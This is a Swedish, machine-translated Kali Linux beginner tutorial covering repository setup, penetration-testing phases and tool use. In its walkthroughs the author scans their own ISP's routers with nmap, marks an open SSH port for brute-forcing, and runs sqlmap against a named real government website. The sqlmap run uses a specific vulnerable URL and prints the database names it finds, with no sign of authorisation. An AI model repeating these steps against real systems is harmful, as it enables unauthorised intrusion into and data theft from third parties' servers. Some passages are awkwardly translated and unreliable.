Kali Linux -handledning

Kali Linux Tutorial



Om du är expert eller åtminstone bekant med Linux, kommandon och miljö, precis installerat Kali Linux på din maskin, ville bli en Master i Kali Linux eller en Ethical Hacker så är du på rätt ställe. I den här artikeln kommer jag att täcka en Kali Linux -handledning för Linux -användare som inte redan är bekanta med Kali och komma igång med några av de grundläggande teknikerna som används för hackning och säkerhetstestning när du använder Kali.

Vad är Kali Linux?

Kali Linux, ( släpptes första gången den 13 mars 2013 ) som formellt kallades BackTrack, utvecklat av säkerhetsföretaget Offensive Security, är en rättsmedicinsk och säkerhetsfokuserad distribution baserad på Debians testkontor. Kali Linux är utformat med tanke på penetrationstest, dataåterställning och hotdetektering. Projektet gick över till en rullande version tidigare i år i ett försök att tillhandahålla mer uppdaterade säkerhetsverktyg till distributionens användare. Kali Linux är gratis, och kommer alltid att vara det. Den har 600+ penetrationstestverktyg inkluderade.







Varför Kali Linux? Är det rätt för dig?

Kali Linux har nyligen blivit mycket populär. Och det finns en anledning bakom det. Hacking är tillbaka som det coolaste att göra i populärkulturen och detta kan hänföras väsentligt till TV-serien Mr. Robot. Mr Robots popularitet hjälpte Kali Linux att få nya användare. Människor med knappt någon kunskap om Linux eller något relaterat till datasäkerhet försöker nu använda Kali som sin huvudsakliga Linux -distribution.



Vår mest avancerade penetrationstestdistribution, någonsin. - Kali Linux -utvecklare. (Det står skrivet på huvudsidan på Kali.org högst upp på sidan.) Vad får du ut av det uttalandet? Märker du detta: APTD (Advanced Penetration Testing Distribution)? Det finns ingen term hacking här bokstavligen. Kali Linux är detsamma som andra Linux -distributioner. Enkelt sagt, det är en Linux-distribution full av säkerhetsrelaterade verktyg och riktad mot nätverks- och datasäkerhetsexperter. Användningen av Kali Linux fokuserar dock bara på säkerhet och kriminalteknik.



En Linux -distribution är inget annat än ett paket som innehåller Linux -kärnan, en uppsättning kärnverktyg och applikationer och några standardinställningar. Så, Kali Linux erbjuder inte något unikt i den bemärkelsen de flesta av de tillhandahållna verktygen kan installeras på vilken Linux -distribution som helst.





Kali Linux är specifikt anpassat för att uppfylla kraven för professionell penetrationstestning och säkerhetsrevision. Den riktar sig till en viss delmängd av Linux -användare. Pentesters, hackare, etc. Det är inte en rekommenderad distribution om du förväntar dig Kali för Linux-skrivbord för utveckling, webbdesign, spel, kontor etc. Kali kan ge dig några utmaningar, även om du är en erfaren Linux-användare .

Saker att göra efter att ha installerat KALI LINUX

Efter att ha installerat Kali Linux kanske du undrar vad du ska göra med det här, eller hur? Alla står inför detta problem, oroa dig inte.



STEG 1: KONFIGURERA REPOSITORIET

För det första kanske du redan vet detta, men det är viktigt att ställa in förvaret korrekt. Som sagt, Kali Linux rullande utgåva modell försöker ge mer uppdaterade säkerhetsverktyg till distributionens användare. I allmänhet, om du har Kali Linux nyligen installerat, refererar förvaret till media du använder för att installera. För att åtgärda detta måste du ändra förvaret till det officiella Kali Linux -förvaret. Filen som krävs finns under /etc/apt/sources.list . Öppna filen med bladplattans textredigerare och ersätt standardförvaret med detta officiella Kali Rolling -arkiv:

deb http://http.kali.org/kali kali-rolling main contrib non-free # For source package access, uncomment the following line # deb-src http://http.kali.org/kali kali-rolling main contrib non-free 

STEG 2: UPPDATERA OCH UPPGRADERA DIN KALI LINUX

Efter den uppdateringen och uppgradera ditt system, synkronisera ditt Kali Linux till den senaste versionen. För att göra det, öppna terminalen och skriv:

apt update -y && apt upgrade -y && apt dist-upgrade 

Kommandot apt update laddar ner och hämtar paketlistan med information från förvaren och uppdaterar dem för att få information om de senaste versionerna av paket och deras beroenden.

Kommandot apt upgrade laddar ner och installerar nyare versioner av paketen med installerade Kali Linux -paket så länge det inte har fel på beroenden.

Den lämpliga dist-uppgraderingen kommer att uppdatera alla paket till den senaste tillgängliga versionen oavsett vad. Och också installera och ta bort beroenden efter behov (installera beroenden för att tillfredsställa paket, uppenbarligen, men också ta bort beroenden som blev föräldralösa om ett paket som uppdaterades inte längre behövde beroendet.

GRUNDLÄGGANDE PENETRATIONSTESTNINGSKONCEPT MED KALI LINUX

När du har lyckats med dessa steg finns det tre huvudsaker du kan göra med Kali Linux baserat på det riktade systemet, inklusive:

  1. Trådlöst nätverkshackning - Wifi -hacking, Phising, ARP -förgiftning, etc.
  2. Hackning av webbappar -SQL Injection, Cross-Site Request Forgery (CSRF), Web Phising, etc.
  3. Enhetshackning - Utnyttja målmaskinen för att få kontroll över den.

Jag inkluderar inte IoT -hackning, det betyder inte att Kali Linux inte har någon förmåga för detta ändamål. Men bokstavligen kan det också tillhöra Device Hacking. Eftersom enheten har fysiskt utseende och form. I denna handledning täckte jag de grundläggande kunskaperna om dem. Eftersom Kali Linux är enormt, passar det inte i en artikel!

Du behöver också veta, penetrationstestcykeln eller proceduren. Dom är:

  1. Spaning - informationssamling
  2. Läser in
  3. Drift
  4. Efter exploatering

TRÅDLÖS NÄTVERKSHACKNING MED KALI LINUX

När det gäller hackning av trådlöst nätverk kan offret variera. Eftersom trådlösa nätverk består av flera saker, såsom ISP (Internet Service Provider), routern och dess kompisar (modem, hub, switch, etc) och klienter (användare, CCTV, fjärrdator, etc). De har också sårbara möjligheter.

Internet är en stor och komplex aggregering av nätverkshårdvara, sammankopplade med gateways. Att spåra vägen dina paket följer är viktigt för att veta hur du når ett visst värdnamn eller mål -IP -adress.

Kali Linux har ett inbyggt verktyg som heter Traceroute. Traceroute använder IP -protokollets tid för att leva fält och försöker framkalla ett ICMP TIME_EXCEEDED -svar från varje gateway längs vägen till någon värd. Traceroute försöker spåra rutten ett IP -paket skulle följa till någon internetvärd genom att starta sondpaket med en liten TTL (tid att leva) och sedan lyssna efter en ICMP -tid överskridet svar från en gateway. Jag kommer att ge dig och exempel hur du spårar en ISP -router som används för att hantera vår anslutning med Traceroute.

1. Erkännande

Informationsinsamling är den viktigaste hoppstarten, missa inte detta steg. I detta steg är vårt syfte att få så mycket som möjligt användbar information vi kan få, och sedan används denna information för ytterligare steg.

Öppna först en terminal och skriv det här kommandot för att börja spåra vägen till webbplatsen, i det här fallet ställer jag in webbplatsen till google.com.

traceroute google.com 

Traceroute Skärmdump

2. Skanning

När vi väl startat kommandona listas var vårt paket går i ordning. Som du kan se ovan fick jag 3 humle varav en av dem är min ISP -server. Den första IP -listan är min router, som fungerar som en gateway. Och de två nästa av dem tillhör min ISP. Låt oss nu kontrollera tjänsten de kör med Nmap. Så, målen vi ska skanna är 10.152.192.1 och 10.13.223.102 . I terminalen körde jag följande kommando:

nmap -v -sS [IP Target] -Pn 

Låt oss bryta ner kommandoets argument:

-v = Aktivera lägesförmåga

-sS = Använd TCP SYN -skanningsteknik

-Pn = Behandla alla värdar som online -hoppa över värdupptäckt

Och här är resultatet vi fick.

nmap skärmdump 2

Tyvärr är alla portar på 10.152.192.1 filtreras betyder det att alla inkommande TCP -anslutningar blockeras av IDS eller brandvägg på denna IP. Nu kan vi ta en ny skanning till det andra målet.

nmap skärmdump 1

3. Drift

I det här förfarandet är jag inte avsedd att utföra den verkliga exploateringen, utan jag visar dig hur. Baserat på Nmap -skanningsresultatet ovan vet vi att denna IP har SSH -server som körs på port 22 och att den är öppen. Det är öppet för att bli brutalt tvingad, haha! Vi hittade hålet, den här SSH -servern är det möjliga hålet vi kan försöka få tillgång till. Det finns flera verktyg i Kali Linux som stöder bruteforce eller ordbokattacker mot SSH -protokoll. Den mest populära och kraftfulla är Hydra.

Ok, det var en grundläggande procedur som utförde ett penetrationstest mot en riktad server, som i vårt exempel här är min ISP -server.

WEBPAPPAR HACKAR MED KALI LINUX

Egentligen, om du brinner för detta kan du konfigurera din hackmiljö genom att installera DWVA (Damn Vulnerable Web App) i din Kali Linux. Det är en PHP/MySQL -webbapplikation som har ett gäng sårbara hål. Dess främsta mål är att vara ett hjälpmedel för säkerhetspersonal att testa sina färdigheter och verktyg i en juridisk miljö och hjälpa webbutvecklare att bättre förstå processerna för att säkra webbapplikationer. Du kan få DWVA gratis på Github här: https://github.com/ethicalhack3r/DVWA.

För nu ska jag visa dig hur du gör Web Apps Hacking på en riktig webbplats. Men lova mig att det bara är utbildningsändamål. Vi kommer att simulera en verklig attack på verklig plats med hjälp av SQL -injektion.

Nödvändig förutsättning

Verktyg som omfattas:

-Whatweb (förinstallerat)

-Nmap (förinstallerad)

- SQLiv (installera manuellt)

-SQLMap (förinstallerat)

Vi behöver ytterligare ett verktyg som är tillgängligt på Github här: https://github.com/Hadesy2k/sqliv, installera det först till vårt Kali Linux. Detta verktyg heter SQLiv som kan göra riktad skanning genom att tillhandahålla specifik domän (med genomsökning). Skriv in terminalen:

git clone https://github.com/Hadesy2k/sqliv.git cd sqliv && sudo python2 setup.py -i 

Mål: www.trenggalekkab.go.id

1. Erkännande

Samla in så mycket användbar information som vi kan få. Vi kan öppna webbsidan och upptäcka vilken applikation som körs på den här webbplatsen. För det första, låt oss kontrollera vilken typ av webbplats det är. Vi kommer att använda whatweb för att göra det.

whatweb www.trenggalekkab.go.id 

Vilken webbskärmdump

Som du kan se resultatet ovan ligger målet i Indonesien. Den springer Apache v2.2.27 på sin webbserver och har också PHP v5.4.31 , den har en IP -adress 103.247.21.142 . Okej, notera det. Du kan behöva besöka dess webbsida, leta efter filen eller sidan som konstruerats, URL -parametrar eller till och med inloggningsformulär. För tillfället behöver vi den IP -adressen för nästa steg som skannas.

2. Skanning

Som tidigare använder vi Nmap igen för att skanna vilka portar och tjänster som körs på målet.

nmap -v -sS 103.247.21.142 

Och här är resultatet vi fick:

Completed SYN Stealth Scan at 21:22, 261.93s elapsed (1000 total ports) Nmap scan report for ip-103-247-21-142.wifian.net.id (103.247.21.142) Host is up (0.069s latency). Not shown: 985 closed ports PORT STATE SERVICE 21/tcp open ftp 25/tcp open smtp 53/tcp open domain 80/tcp open http 110/tcp open pop3 111/tcp open rpcbind 143/tcp open imap 212/tcp open anet 443/tcp open https 465/tcp open smtps 587/tcp open submission 993/tcp open imaps 995/tcp open pop3s 3128/tcp filtered squid-http  3306/tcp open mysql  

Det finns massor av öppna portar som hanterar varje tjänst på målet, men den som ser iögonfallande ut är att mysql-tjänsten på port 3306. Det anges att denna webbplats använder mysql att hantera sin information i databaser. Sedan undrar jag om det finns några sårbarheter med SQL -injektion på den här webbplatsen. Så jag skannar webbplatsen igen med SQLiv som vi just har installerat. Jag skrev kommandot:

sqliv -t www.trenggalekkab.go.id 

SQLHacking ScreenShot1

Vi hittade två möjliga SQL -sårbara webbadresser på den här webbplatsen. Notera dessa webbadresser.

3. Drift

Ok, vi har SQL -sårbara webbadresser och redo för körning. För att göra det kommer vi att använda SQLMap. Syntaxen är:

sqlmap [Vulnerable URL] --dbs 

Kommandot ska se ut så här:

 sqlmap -u "http://www.trenggalekkab.go.id/berita.php?page=208" --dbs 

Argumentet –dbs är att berätta för SQLMap att skaffa måldatabaser. Här är resultatet vi fick:

[INFO] the back-end DBMS is MySQL web application technology: PHP 5.4.31, Apache 2.2.27 back-end DBMS: MySQL 5 [21:46:04] [INFO] fetching database names [21:46:04] [INFO] the SQL query used returns 2 entries [21:46:04] [INFO] resumed: information_schema [21:46:04] [INFO] resumed: trengkab_trg available databases [2]: [*] information_schema [*] trengkab_trg 

SQLMap hittade två databaser, men bara en bland dem som innehåller känslig data, till exempel ett administratörskontokonto. Det finns på trengkab_trg. När vi har hittat databaserna finns det ytterligare ett steg vi bör göra. Det är att hitta tabellerna och kolumnerna och det sista steget är att dumpa data. Jag kommer inte att visa dig hur du använder det här målet i det här avsnittet. Åtminstone du känner till grundidén om attackcykeln och använder några verktyg.

ENHETSHACKNING

I en framtida artikel på denna webbplats kommer vi att täcka hacking av enheter, håll utkik. Som en förvarning vill du se till att du kan lite Python för detta.